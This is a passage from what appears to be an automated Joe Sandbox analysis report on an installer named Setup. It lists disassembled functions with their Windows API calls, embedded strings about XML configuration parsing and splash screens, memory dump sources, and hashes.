                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8H_prolog3InfoOptedSystemThrowWindows
                                                                                                                                                                    • String ID: AlwaysUploaded$Disabled$OSControlled$ParameterInfo.xml$UserControlled$schema validation failure: Invalid Policy Value being defined.
                                                                                                                                                                    • API String ID: 3692811390-1543467451
                                                                                                                                                                    • Opcode ID: db757b25402b731988add7eb31ae1a3d299323d8a907a1c22787164e593cf590
                                                                                                                                                                    • Instruction ID: de5b7d0fc012e9973f6cbca2e7640e94e19aca0c61de105993b88b52e9c9a92a
                                                                                                                                                                    • Opcode Fuzzy Hash: db757b25402b731988add7eb31ae1a3d299323d8a907a1c22787164e593cf590
                                                                                                                                                                    • Instruction Fuzzy Hash: 5041D875900149DFCB14DBE8C944BDDB7B9AF16358F008235E815EFA85DB30DA448BB1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAA2DD Relevance: 16.8, APIs: 5, Strings: 6, Instructions: 271COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 69D7C53D: GetLastError.KERNEL32(?,69DAA320,F0D05EFD,?,?), ref: 69D7C55E
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69DB1236: __EH_prolog3.LIBCMT ref: 69DB123D
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA393
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA434
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA4A7
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA511
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 69DAA5A5
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to record SetUserId, xrefs: 69DAA3C0
                                                                                                                                                                    • Failed to record StartupAppid, xrefs: 69DAA4C1
                                                                                                                                                                    • Failed to record StartSession, xrefs: 69DAA322
                                                                                                                                                                    • Failed to record current state name, xrefs: 69DAA52B
                                                                                                                                                                    • Failed to record MPC, xrefs: 69DAA5BB
                                                                                                                                                                    • Failed to record SetMachineId, xrefs: 69DAA461
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$H_prolog3
                                                                                                                                                                    • String ID: Failed to record MPC$Failed to record SetMachineId$Failed to record SetUserId$Failed to record StartSession$Failed to record StartupAppid$Failed to record current state name
                                                                                                                                                                    • API String ID: 3502553090-2804495384
                                                                                                                                                                    • Opcode ID: bae761830b9203b8b3aecc739a866df88f24d8f128ef8652bfd2f7b75172b1d4
                                                                                                                                                                    • Instruction ID: f131e73cee6b0d64b04b4de7707836608a5fc676a4c11bc4e07cff1d1c2ae517
                                                                                                                                                                    • Opcode Fuzzy Hash: bae761830b9203b8b3aecc739a866df88f24d8f128ef8652bfd2f7b75172b1d4
                                                                                                                                                                    • Instruction Fuzzy Hash: F0A19E71208242DFD720DF64C945A5F7BE9BF443A4F005A3CF4A6CB6A1D775D9088BA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D92127 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 317COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D9212E
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D92484
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw
                                                                                                                                                                    • String ID: CopyPackageFilesToDownloadLocation$DelayBetweenRetries$DownloadRetries$Items$No items found. The package must contain at least one item.$ParameterInfo.xml$true
                                                                                                                                                                    • API String ID: 2489616738-2573507987
                                                                                                                                                                    • Opcode ID: a44a0e996b51402cfc0b2fcb4bc718a5941b4ecadbf8675c74468da264e63b81
                                                                                                                                                                    • Instruction ID: 053cebae4a6d392841c0d07ee523f981452881e587a6351a90da2e43f730cc4e
                                                                                                                                                                    • Opcode Fuzzy Hash: a44a0e996b51402cfc0b2fcb4bc718a5941b4ecadbf8675c74468da264e63b81
                                                                                                                                                                    • Instruction Fuzzy Hash: 46D12D74900249DFCF01DFA8C984AAEBBB9BF49318F1481A9E515EB791C734DA05CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69A732BC Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 303COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 69A73302
                                                                                                                                                                      • Part of subcall function 69A73679: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,69A7332F,?), ref: 69A73683
                                                                                                                                                                      • Part of subcall function 69A73679: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,?,69A7332F,?), ref: 69A736B3
                                                                                                                                                                      • Part of subcall function 69A73679: ConvertSidToStringSidW.ADVAPI32(00000000,?), ref: 69A736D5
                                                                                                                                                                      • Part of subcall function 69A73679: FindCloseChangeNotification.KERNEL32(?,?,00000001,?,?,?,?,69A7332F,?), ref: 69A736E0
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(69A90168,?), ref: 69A73334
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(69A90168,00000400,?), ref: 69A733F5
                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 69A7340C
                                                                                                                                                                    • SetLastError.KERNEL32(00000057), ref: 69A7341F
                                                                                                                                                                      • Part of subcall function 69A717EB: malloc.MSVCRT ref: 69A717F6
                                                                                                                                                                    • ctype.LIBCPMT ref: 69A7EDDC
                                                                                                                                                                      • Part of subcall function 69A7343E: GetSystemTime.KERNEL32(00000000,00000838,00000000), ref: 69A7347D
                                                                                                                                                                      • Part of subcall function 69A7343E: SystemTimeToFileTime.KERNEL32(00000000,00000000), ref: 69A7348B
                                                                                                                                                                      • Part of subcall function 69A730D2: InterlockedIncrement.KERNEL32(00000000), ref: 69A730D8
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, Offset: 69A70000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207888905.0000000069A70000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208013345.0000000069A90000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208074023.0000000069A91000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69a70000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$CriticalProcessSectionSystem$ChangeCloseConvertCurrentEnterErrorFileFindFreeIncrementInterlockedLastLeaveLocalNotificationOpenStringTokenctypemallocmemset
                                                                                                                                                                    • String ID: %s_%s$W
                                                                                                                                                                    • API String ID: 1092980461-4070589124
                                                                                                                                                                    • Opcode ID: 2fca1214d22e6e24d0bc12a1a5f82db32f86813869208719c74dcced1cb7c7c8
                                                                                                                                                                    • Instruction ID: fd91d8ff6e440254c04c93cf20b918803dbac15982e9ba4d1673540f77d743cb
                                                                                                                                                                    • Opcode Fuzzy Hash: 2fca1214d22e6e24d0bc12a1a5f82db32f86813869208719c74dcced1cb7c7c8
                                                                                                                                                                    • Instruction Fuzzy Hash: DEC1BF39850358AFDB71CF14CE86BEA7AF9BF40B44F15C094A895AE161CF718AC58F90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D83BA9 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 263COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • CustomErrorHandling, xrefs: 69D83BFA
                                                                                                                                                                    • Adding Custom Code , xrefs: 69D83E02
                                                                                                                                                                    • ReturnCode, xrefs: 69D83CCA
                                                                                                                                                                    • MSIErrorMessage, xrefs: 69D83D0D
                                                                                                                                                                    • CustomErrorHandling element not defined, xrefs: 69D83BE1
                                                                                                                                                                    • schema validation failure: Expect at least one CustomError element., xrefs: 69D83C59
                                                                                                                                                                    • Processing CustomErrorHandling element block, xrefs: 69D83BF0
                                                                                                                                                                    • ParameterInfo.xml, xrefs: 69D83C67
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: Adding Custom Code $CustomErrorHandling$CustomErrorHandling element not defined$MSIErrorMessage$ParameterInfo.xml$Processing CustomErrorHandling element block$ReturnCode$schema validation failure: Expect at least one CustomError element.
                                                                                                                                                                    • API String ID: 431132790-2299275001
                                                                                                                                                                    • Opcode ID: 26912cad28117fa7462c4a4d92fe9058399cd5a27de665ec590a778bf92a41df
                                                                                                                                                                    • Instruction ID: 1ef4b46ad48956e14c90fd6fbc4eefc073bb1bdb96891f2f2e296236f6c3e754
                                                                                                                                                                    • Opcode Fuzzy Hash: 26912cad28117fa7462c4a4d92fe9058399cd5a27de665ec590a778bf92a41df
                                                                                                                                                                    • Instruction Fuzzy Hash: 31B17CB1900249EFDF10DFE8C945BEEBBB8BF05318F148668E425BB691D7749A04CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DA7B40 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 95timethreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 69DA7B4A
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 69DA7BB4
                                                                                                                                                                    • _memset.LIBCMT ref: 69DA7BF4
                                                                                                                                                                    • GetTimeZoneInformation.KERNEL32(?), ref: 69DA7C03
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000007,?), ref: 69DA7C3F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CommandH_prolog3H_prolog3_InformationLineLocaleThreadTimeZone_memset
                                                                                                                                                                    • String ID: CommandLine = %s$Environment details$Initial LCID = %u$TimeZone = %s
                                                                                                                                                                    • API String ID: 1050886296-4009495903
                                                                                                                                                                    • Opcode ID: 555210cea2a19bb0b96b2e4dd6a8e43bd661f668b48d88c9467706cae4cd2b2b
                                                                                                                                                                    • Instruction ID: b9588c34e54d3bd891e3c46d879addb8f5c82f3567e0e8d8bdd3ca0145d8a588
                                                                                                                                                                    • Opcode Fuzzy Hash: 555210cea2a19bb0b96b2e4dd6a8e43bd661f668b48d88c9467706cae4cd2b2b
                                                                                                                                                                    • Instruction Fuzzy Hash: 94313875900258EBEB20DBA4CC49F8DBBBDBF05304F1485A9E109E7690DB749A48CF62
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D98DBF Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D98DC6
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    • PathIsRelativeW.SHLWAPI(?,?,?,00000024,69DC2414), ref: 69D98DE4
                                                                                                                                                                    • PathFileExistsW.SHLWAPI(?), ref: 69D98E1F
                                                                                                                                                                      • Part of subcall function 69D75D3F: __EH_prolog3.LIBCMT ref: 69D75D46
                                                                                                                                                                      • Part of subcall function 69D75D3F: GetModuleFileNameW.KERNEL32(69D50000,00000010,00000104,?,69DA831D,00000000), ref: 69D75D93
                                                                                                                                                                      • Part of subcall function 69DA8E4A: PathAppendW.SHLWAPI(00000000,?,?,?,?,?,69DB99FD,00000000,00000000,?,?,?,00000000,?,UiInfo.xml), ref: 69DA8E6E
                                                                                                                                                                      • Part of subcall function 69D98EB8: CreateWindowExW.USER32(00000000,STATIC,00000000,0000000E,80000000,80000000,00000000,00000000,00000000,00000000,00000000), ref: 69D98F00
                                                                                                                                                                      • Part of subcall function 69D98EB8: GetWindowLongW.USER32(?,000000F0), ref: 69D98F15
                                                                                                                                                                      • Part of subcall function 69D98EB8: SetWindowLongW.USER32(?,000000F0,00000000), ref: 69D98F25
                                                                                                                                                                      • Part of subcall function 69D98EB8: LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00000010), ref: 69D98F32
                                                                                                                                                                      • Part of subcall function 69D98EB8: GetDesktopWindow.USER32 ref: 69D98F44
                                                                                                                                                                      • Part of subcall function 69D98EB8: ShowWindow.USER32(?,00000001), ref: 69D98F57
                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 69D98E4E
                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 69D98E57
                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 69D98E78
                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 69D98E82
                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 69D98E8F
                                                                                                                                                                    Strings
                                                                                                                                                                    • Splash screen file '%s' not found, xrefs: 69D98E2F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$H_prolog3Path$FileLongMessageShow$AppendCallbackCreateDesktopDispatchDispatcherExistsImageLoadModuleNameRelativeTranslateUpdateUser
                                                                                                                                                                    • String ID: Splash screen file '%s' not found
                                                                                                                                                                    • API String ID: 3262628749-2590370906
                                                                                                                                                                    • Opcode ID: cd1730879f0d5cca2c86966c194576ec3c8db91b30f8ddfdbf9d86868158a007
                                                                                                                                                                    • Instruction ID: 340a45c4339e5751120cb50192b023bbb6735a73ba6420eb83e8b97d5360e32b
                                                                                                                                                                    • Opcode Fuzzy Hash: cd1730879f0d5cca2c86966c194576ec3c8db91b30f8ddfdbf9d86868158a007
                                                                                                                                                                    • Instruction Fuzzy Hash: 1B219736900259EBEF10EFF4CD48AAEBBB9BF05358F009535F810AB690D735DA548B21
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBD446 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 206COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 69DBD44D
                                                                                                                                                                    • GetCommandLineW.KERNEL32(0000006C,69DBB3B6,?,00000738,69DAFA6E,?,69D6A794,02602230), ref: 69DBD48E
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 69DBD4EF
                                                                                                                                                                    • CoUninitialize.OLE32(?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 69DBD6A9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CommandH_prolog3_catchInitializeLineUninitialize
                                                                                                                                                                    • String ID: Hide$SplashScreen$UiInfo.xml$nosplashscreen
                                                                                                                                                                    • API String ID: 1338294413-2964427009
                                                                                                                                                                    • Opcode ID: 175d7937a257f34476e7f41ec0805c0c265f95091dab6808d2e44b57c23b68f9
                                                                                                                                                                    • Instruction ID: 1a6c6ef60f89fa02aa531e4da289b5d3d9b219a0eac4fc07dada557c315deb0c
                                                                                                                                                                    • Opcode Fuzzy Hash: 175d7937a257f34476e7f41ec0805c0c265f95091dab6808d2e44b57c23b68f9
                                                                                                                                                                    • Instruction Fuzzy Hash: C4817CB1900288DBDF01DFE8C944BDEBBB8AF15318F1481A9E455EB685CB35DA09CB71
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DDBFF Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698DDC06
                                                                                                                                                                      • Part of subcall function 698DD923: __EH_prolog3.LIBCMT ref: 698DD92A
                                                                                                                                                                      • Part of subcall function 698DD923: PathIsRelativeW.SHLWAPI(00000000,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD960
                                                                                                                                                                      • Part of subcall function 698DD923: GetModuleFileNameW.KERNEL32(00000010,00000104,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DD9BA
                                                                                                                                                                      • Part of subcall function 698DD923: PathCombineW.SHLWAPI(?,?,?,00000000,?,00000000,00000008,698EE271,00000000,?,?,00000DF0,?,?), ref: 698DDA0D
                                                                                                                                                                    • CoCreateInstance.OLE32(698D7930,00000000,00000017,698D7970,?,?,?,?,00000030,698E62D8), ref: 698DDC48
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 698DDC69
                                                                                                                                                                      • Part of subcall function 698EE8E8: __EH_prolog3.LIBCMT ref: 698EE8EF
                                                                                                                                                                      • Part of subcall function 698DDE1D: __EH_prolog3.LIBCMT ref: 698DDE24
                                                                                                                                                                      • Part of subcall function 698DDE1D: SysFreeString.OLEAUT32(00000000), ref: 698DDE6B
                                                                                                                                                                      • Part of subcall function 698DCA39: __EH_prolog3.LIBCMT ref: 698DCA40
                                                                                                                                                                      • Part of subcall function 698DCAC2: __EH_prolog3.LIBCMT ref: 698DCAC9
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 698DDD4B
                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 698DDD87
                                                                                                                                                                      • Part of subcall function 698DB93E: __EH_prolog3.LIBCMT ref: 698DB945
                                                                                                                                                                    Strings
                                                                                                                                                                    • CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d, xrefs: 698DDC58
                                                                                                                                                                    • m_spDoc->get_documentElement() failed. Parse error is: %s, xrefs: 698DDD19
                                                                                                                                                                    • m_spDoc->loadXML() failed. Parse error is: %s, xrefs: 698DDDFE
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$FreeString$Path$CombineCreateException@8FileInstanceModuleNameRelativeThrow
                                                                                                                                                                    • String ID: CoCreateInstance(__uuidof(DOMDocument30)) failed with hr=%d$m_spDoc->get_documentElement() failed. Parse error is: %s$m_spDoc->loadXML() failed. Parse error is: %s
                                                                                                                                                                    • API String ID: 3627190661-2525052916
                                                                                                                                                                    • Opcode ID: 2403e9f38c17a7fd01d16e3263ba48c626b829b876b746d874e71fd994ce06be
                                                                                                                                                                    • Instruction ID: a19591d6f1403cbd9b08efeada7cf9284378797632b01e7e6eb83e84d5c3513a
                                                                                                                                                                    • Opcode Fuzzy Hash: 2403e9f38c17a7fd01d16e3263ba48c626b829b876b746d874e71fd994ce06be
                                                                                                                                                                    • Instruction Fuzzy Hash: 7F61AF76800149EFCF00DBE8C884EEEBBB8AF19308F54995EF151A7291D7349A09CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D79C3A Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 174COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D79C41
                                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 69D79D24
                                                                                                                                                                    • __fassign.LIBCMT ref: 69D79D58
                                                                                                                                                                    • _wcstoul.LIBCMT ref: 69D79D65
                                                                                                                                                                      • Part of subcall function 69DCB6D0: wcstoxl.LIBCMT ref: 69DCB6E0
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D7838A: __EH_prolog3.LIBCMT ref: 69D78391
                                                                                                                                                                    • __get_errno.LIBCMT ref: 69D79D74
                                                                                                                                                                    Strings
                                                                                                                                                                    • ", xrefs: 69D79D88
                                                                                                                                                                    • schema validation failure: non-numeric value, %s, for %s, xrefs: 69D79DB1
                                                                                                                                                                    • schema validation failure: empty value, %s, for %s, xrefs: 69D79CA1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$Exception@8Throw__fassign__get_errno_wcstoulwcstoxl
                                                                                                                                                                    • String ID: "$schema validation failure: empty value, %s, for %s$schema validation failure: non-numeric value, %s, for %s
                                                                                                                                                                    • API String ID: 2631245360-326575430
                                                                                                                                                                    • Opcode ID: 3a6e289e4a2b6cb07da387cc6ac425fb09583433129509e781cb0b19fbe09846
                                                                                                                                                                    • Instruction ID: 5addb80ce68f5c4fa4081f61a185b7693ae0832e2516bcb232ff8db9182ae271
